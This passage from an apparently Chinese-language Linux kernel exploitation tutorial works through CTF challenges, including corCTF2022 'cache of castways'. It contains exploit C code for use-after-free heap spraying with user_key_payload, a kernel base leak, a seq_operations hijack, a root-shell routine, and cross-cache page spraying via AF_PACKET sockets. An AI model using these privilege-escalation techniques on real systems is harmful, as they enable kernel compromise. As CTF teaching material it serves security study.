unsignedint writers; unsignedint files; unsignedint r_counter; unsignedint w_counter; bool poll_usage; structpage *tmp_page; structfasync_struct *fasync_readers; structfasync_struct *fasync_writers; structpipe_buffer *bufs;//存放pipe_buffer数组 structuser_struct *user; #ifdef CONFIG_WATCH_QUEUE structwatch_queue *watch_queue; #endif };
/** * struct pipe_buffer - a linux kernel pipe buffer * @page: the page containing the data for the pipe buffer * @offset: offset of data inside the @page * @len: length of data inside the @page * @ops: operations associated with this buffer. See @pipe_buf_operations. * @flags: pipe buffer flags. See above. * @private: private data owned by the ops. **/ structpipe_buffer { structpage *page; unsignedint offset, len; conststructpipe_buf_operations *ops; unsignedint flags; unsignedlong private; };
/* * Note on the nesting of these functions: * * ->confirm() * ->try_steal() * * That is, ->try_steal() must be called on a confirmed buffer. See below for * the meaning of each operation. Also see the kerneldoc in fs/pipe.c for the * pipe and generic variants of these hooks. */ structpipe_buf_operations { /* * ->confirm() verifies that the data in the pipe buffer is there * and that the contents are good. If the pages in the pipe belong * to a file system, we may need to wait for IO completion in this * hook. Returns 0 for good, or a negative error value in case of * error. If not present all pages are considered good. */ int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);
/* * When the contents of this pipe buffer has been completely * consumed by a reader, ->release() is called. */ void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
/* * Attempt to take ownership of the pipe buffer and its contents. * ->try_steal() returns %true for success, in which case the contents * of the pipe (the buf->page) is locked and now completely owned by the * caller. The page may then be transferred to a different mapping, the * most often used case is insertion into different file address space * cache. */ bool (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);
/* * Get a reference to the pipe buffer. */ bool (*get)(struct pipe_inode_info *, struct pipe_buffer *); };
voidmain(){ bind_cpu(0); saveStatus(); size_t* buf; char description[0x50]; int key_id[KEY_SPRAY_NUM]; int victim_key_idx = -1, kernel_offset = -1, pipe_key_id; int pipe_fd[2], pipe_key_ret; size_t pipe_buffer_addr;
buf = malloc(sizeof(size_t)*0x4000);
rwctf_fd = open("/dev/rwctf", O_RDONLY); if(rwctf_fd < 0){ error_log("/dev/rwctf had open failed!"); }
/* * construct the UAF obj,we just alloc and then free it to the cpu->freelist * */ info_log("Construct the UAF obj"); my_alloc(0, PIPE_NODE_INFO_SZ, buf); my_delete(0);
/* * the UAF obj always be used by allocating the pre_payload,then alloc new obj for user_key_payload * so we could use the current cpu->freelist by heap sparying the user_key_payload * then the current slab will put to the kmem_cache_node,then get a new slab for allocating * finally, the UAF obj will be put into the kmem_cache_node * ====================================================================================== * 1. use user_key_payload to full the cpu_freelist * 2. then we will put the current slab to the node * 3. during this time key_alloc, we finally will free the pre_payload, so we free the uaf obj in node * 4. next time we alloc pre_payload will from other slab----current cpu->freelist * 5. after that, we must to continue for sparying in order to full the current slab * 6. when the current slab full, the node slab will be put on the cpu_freelist,and use UAF obj to alloc user_key_payload * */ info_log("Starting sparying the user_key_payload"); for(int i = 0; i < KEY_SPRAY_NUM; i++){ snprintf(description, 0x50, "%s%d", "peiwithhao", i); key_id[i] = key_alloc(description, buf, PIPE_NODE_INFO_SZ - 0x18); //0x18 is the user_key_payload head if(key_id[i] < 0){ error_log("key alloc failed!"); } }
//the UAF obj now be allocated as user_key_payload my_delete(0); //free the uaf obj, and allocate it again by second sparying,so we could modify the user_key_payload //modify the buf,so we can overwrite the user_key_payload info_log("Starting sparying the uaf obj"); buf[0] = 0; buf[1] = 0; buf[2] = 0x2000; for(int i = 0;i < (KEY_SPRAY_NUM*2); i++){ my_alloc(0, PIPE_NODE_INFO_SZ, buf); } info_log("Sparying nearly four slab, it should be written!");
for(int i = 0; i < KEY_SPRAY_NUM; i++){ if(key_read(key_id[i], buf, 0x4000) > PIPE_NODE_INFO_SZ){ printf("[*]Found the victim key_idx : %d\n", i); victim_key_idx = i; }else{ key_revoke(key_id[i]); //then the user_key_payload's head->call_back_head will be put by user_free_payload_rcu() } } if(victim_key_idx == -1){ error_log("Found the victim key_id failed:("); } info_log("victim key_id founded!");
/* find the rcu_head->callback_head */ for(int i = 0; i < 0x2000/8 ; i++){ if((buf[i]&0xfff) == 0x210){ kernel_offset = buf[i] - USER_FREE_PAYLOAD_RCU; kernel_base += kernel_offset; break; } } if(kernel_offset == -1){ error_log("can not find the kernel offset"); } PRINT_ADDR("Kernel_base", kernel_base); PRINT_ADDR("Kernel_offset", kernel_offset);
/* * Let the user_key_payload and pipe_inode_info belong to the same obj * * */ /* Construct the freelist 0->1 */ my_alloc(0, PIPE_NODE_INFO_SZ, buf); my_alloc(1, PIPE_NODE_INFO_SZ, buf); my_delete(1); my_delete(0); /* 1 object will be the user_key_payload */ pipe_key_id = key_alloc("peiwithhao", buf, PIPE_NODE_INFO_SZ - 0x18); my_delete(1); /* prepare for the pipe buffer */ my_alloc(0, PIPE_BUFFER_SZ, buf); my_delete(0); pipe(pipe_fd);
info_log("Starting control the process"); pipe_key_ret = key_read(pipe_key_id, buf, 0xffff);
config SLAB_FREELIST_RANDOM bool "Randomize slab freelist" dependson SLAB || SLUB help Randomizes the freelist order used on creating new pages. This security feature reduces the predictability of the kernel slab allocator against heap overflows.
config SLAB_FREELIST_HARDENED bool "Harden slab freelist metadata" dependson SLUB help Many kernel heap attacks try to target slab cache metadata and other infrastructure. This options makes minor performance sacrifices to harden the kernel slab allocator against common freelist exploit methods.
/* * Returns freelist pointer (ptr). With hardening, this is obfuscated * with an XOR of the address where the pointer is held and a per-cache * random number. */ staticinlinevoid *freelist_ptr(conststruct kmem_cache *s, void *ptr, unsignedlong ptr_addr) { #ifdef CONFIG_SLAB_FREELIST_HARDENED /* * When CONFIG_KASAN_SW/HW_TAGS is enabled, ptr_addr might be tagged. * Normally, this doesn't cause any issues, as both set_freepointer() * and get_freepointer() are called with a pointer with the same tag. * However, there are some issues with CONFIG_SLUB_DEBUG code. For * example, when __free_slub() iterates over objects in a cache, it * passes untagged pointers to check_object(). check_object() in turns * calls get_freepointer() with an untagged pointer, which causes the * freepointer to be restored incorrectly. */ return (void *)((unsignedlong)ptr ^ s->random ^ swab((unsignedlong)kasan_reset_tag((void *)ptr_addr))); #else return ptr; #endif }
# use the /dev/console device node from devtmpfs if possible to not # confuse glibc's ttyname_r(). # This may fail (E.G. booted with console=), and errors from exec will # terminate the shell, so use a subshell for the test if (exec 0</dev/console) 2>/dev/null; then exec 0</dev/console exec 1>/dev/console exec 2>/dev/console fi
voidget_root_shell(){ if(getuid()){ error_log("Failed to get root shell..."); } info_log("I will get root shell..."); system("cat /flag"); info_log("You got my shell :)"); exit(0); }
middle_rsp = user_sp + 0x8; root_shell = (size_t)get_root_shell; size_t data[0x20]; int seq_fd[0x200]; info_log("Step I:Create a queue without any queue_entry :)"); dev_fd = open("/dev/kqueue", O_RDONLY); create_kqueue(0xffffffff, 0x20*8); //the queue->data include many shellcode ad
for(int i = 0; i < 0x20; i++){ data[i] = (size_t)shellcode; } edit_kqueue(0, 0, (char *)data); info_log("Step II:Spraying the seq_operations!"); for(int i = 0; i < 0x200; i++){ seq_fd[i] = open("/proc/self/stat", O_RDONLY); } printf("the get shell addr is :0x%lx\n", (size_t)get_root_shell); info_log("Step III:Overwrite 0x20 bytes..."); save_kqueue(0, 0, 0x40); for(int i= 0; i < 0x200; i++){ read(seq_fd[i], data, 0x8); } }
八、Kernel Heap - Cross Cache Overflow
例题:corCTF2022-cache of castways
题目首先给出README,我们来康康,BitsByWill师傅给出了这样一段提示:
After repeated attacks on poor kernel objects, I’ve decided to place pwners in a special isolated place - a marooned region of memory. Good luck escaping out of here :^)
staticintinit_castaway_driver(void) { castaway_dev.minor = MISC_DYNAMIC_MINOR; castaway_dev.name = DEVICE_NAME; castaway_dev.fops = &castaway_fops; castaway_dev.mode = 0644; mutex_init(&castaway_lock); if (misc_register(&castaway_dev)) { return-1; } castaway_arr = kzalloc(MAX * sizeof(castaway_t *), GFP_KERNEL); //400个 castaway_t大小的数组 if (!castaway_arr) { return-1; } castaway_cachep = KMEM_CACHE(castaway_cache, SLAB_PANIC | SLAB_ACCOUNT); //出题者自行构造的隔离kmem_cache if (!castaway_cachep) { return-1; } printk(KERN_INFO "All alone in an castaway cache... \n"); printk(KERN_INFO "There's no way a pwner can escape!\n"); return0; }
其中 KMEM_CACHE是一个创建 kmem_cache的宏,如下:
1 2 3 4 5 6 7 8 9 10 11
/* * Please use this macro to create slab caches. Simply specify the * name of the structure and maybe some flags that are listed above. * * The alignment of the struct determines object alignment. If you * f.e. add ____cacheline_aligned_in_smp to the struct declaration * then the objects will be properly aligned in SMP configurations. */ #define KMEM_CACHE(__struct, __flags) \ kmem_cache_create(#__struct, sizeof(struct __struct), \ __alignof__(struct __struct), (__flags), NULL)
/* * * alloc_pages_via_sock - page allocation primitive * @size: once order-* allocation in page level * @n: the times you want to allocate * Return: the new socket fd * */ intalloc_pages_via_sock(uint32_t size, uint32_t n){ structtpacket_req req; int32_t socketfd, version;
/* Create the AF_PACKET socket */ socketfd = socket(AF_PACKET, SOCK_RAW, PF_PACKET); if(socketfd < 0){ error_log("Create the AF_PACKET socket failed..."); }
version = TPACKET_V1;
/* Set the ring buffer version */ if(setsockopt(socketfd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)) < 0) { error_log("setsocketopt PACKET_VETSION failed..."); }
assert(size % 4096 == 0); //size must be the 4096x*
voidsend_spray_cmd(enum spray_cmd cmd, int idx){ ipc_req_t req; int32_t result;
req.cmd = cmd; req.idx = idx; /* write to child manager for cmd */ write(sprayfd_child[1], &req, sizeof(req)); /* read from parent pipe which just been writen by child manager */ read(sprayfd_parent[0], &result, sizeof(result)); assert(result == idx); }
voidalloc_vuln_page(int fd, full_page *arr, int page_idx){ assert(!arr[page_idx].in_use); for(int i = 0; i < ISO_SLAB_LIMIT; i++){ long result = alloc(fd); if(result < 0){ error_log("Allocation vuln page error..."); } arr[page_idx].idx[i] = result; } arr[page_idx].in_use = true; }
voidedit_vuln_page(int fd, full_page *arr, int page_idx, uint8_t *buf, size_t sz){ assert(arr[page_idx].in_use); for(int i = 0; i < ISO_SLAB_LIMIT; i++){ long result = edit(fd, arr[page_idx].idx[i], sz, buf); if(result < 0){ error_log("edit error..."); } } }
intmain(int argc, char **argv){
info_log("Step I: Open the vulnurability driver..."); int fd = open("/dev/castaway", O_RDONLY); if(fd < 0){ error_log("Driver open failed!"); }
info_log("Step II: Construct two pipe for communicating in those namespace..."); pipe(sprayfd_child); pipe(sprayfd_parent);
info_log("Step III: Setting up spray manager in separate namespace..."); if(!fork()){ unshare_setup(getuid(), getgid()); spray_comm_handler(); } /* For communicating with the fork later */ pipe(rootfd); char evil[CHUNK_SIZE]; memset(evil, 0, sizeof(evil));
info_log("Step IV: Draining Start!"); puts("[*]draining cred_jar..."); for(int i = 0; i < CRED_JAR_INITIAL_SPRAY; i++){ pid_t result = fork(); if(!result){ just_wait(); } if(result < 0){ error_log("fork limit..."); } } puts("[*]draining Buddysystem, of course order 0 :)"); for(int i = 0; i < INITIAL_PAGE_SPRAY; i++){ send_spray_cmd(ALLOC_PAGE, i); } /* Free the medium one, of many in other words... */ for(int i = 1; i < INITIAL_PAGE_SPRAY; i += 2){ send_spray_cmd(FREE_PAGE, i); } for(int i = 0; i < FORK_SPRAY; i++){ pid_t result = __clone(CLONE_FLAGS, &check_and_wait); if(result < 0){ error_log("clone error..."); } } for(int i = 0; i < INITIAL_PAGE_SPRAY; i += 2){ send_spray_cmd(FREE_PAGE, i); }
PR_SET_SECCOMP (since Linux 2.6.23) Set the secure computing (seccomp) mode forthe calling thread, to limit the available system calls. The more recent seccomp(2) system call provides a superset ofthe functionality of PR_SET_SECCOMP, and is the preferred interface fornew applications.
The seccomp mode is selected via arg2. (The seccomp constants are defined in <linux/seccomp.h>.) The following values can be specified:
...
SECCOMP_MODE_FILTER (since Linux 3.5) The allowed system calls are defined bya pointer toa Berkeley Packet Filter passed in arg3. This argument is a pointer to struct sock_fprog; it can be designed tofilter arbitrary system calls and system call arguments. See the description of SECCOMP_SET_MODE_FILTER in seccomp(2).
This operation is available only ifthe kernel is configured with CONFIG_SECCOMP_FILTER enabled.
SECCOMP_SET_MODE_FILTER The system calls allowed are defined by a pointer to a Berkeley Packet Filter (BPF) passed via args. This argument is a pointer to a struct sock_fprog; it can be designed to filter arbitrary system calls and system call arguments. If the filter is invalid, seccomp() fails, returning EINVAL in errno.
If fork(2) or clone(2) is allowed by the filter, any child processes will be constrained to the same system call filters as the parent. If execve(2) is allowed, the existing filters will be preserved across a callto execve(2).
Inorderto use the SECCOMP_SET_MODE_FILTER operation, either the calling thread must have the CAP_SYS_ADMIN capability in its user namespace, or the thread must already have the no_new_privs bit set. If that bit was not already setby an ancestor of this thread, the thread must make the following call:
prctl(PR_SET_NO_NEW_PRIVS, 1);
Otherwise, the SECCOMP_SET_MODE_FILTER operation fails and returns EACCES in errno. This requirement ensures that an unprivileged process cannot apply a malicious filter andthen invoke a set-user-ID or other privileged program using execve(2), thus potentially compromising that program. (Such a malicious filter might, for example, cause an attempt to use setuid(2) toset the caller's user IDs to nonzero values to instead return0 without actually making the system call. Thus, the program might be tricked into retaining superuser privileges in circumstances where it is possible to influence it todo dangerous things because it did not actually drop privileges.)
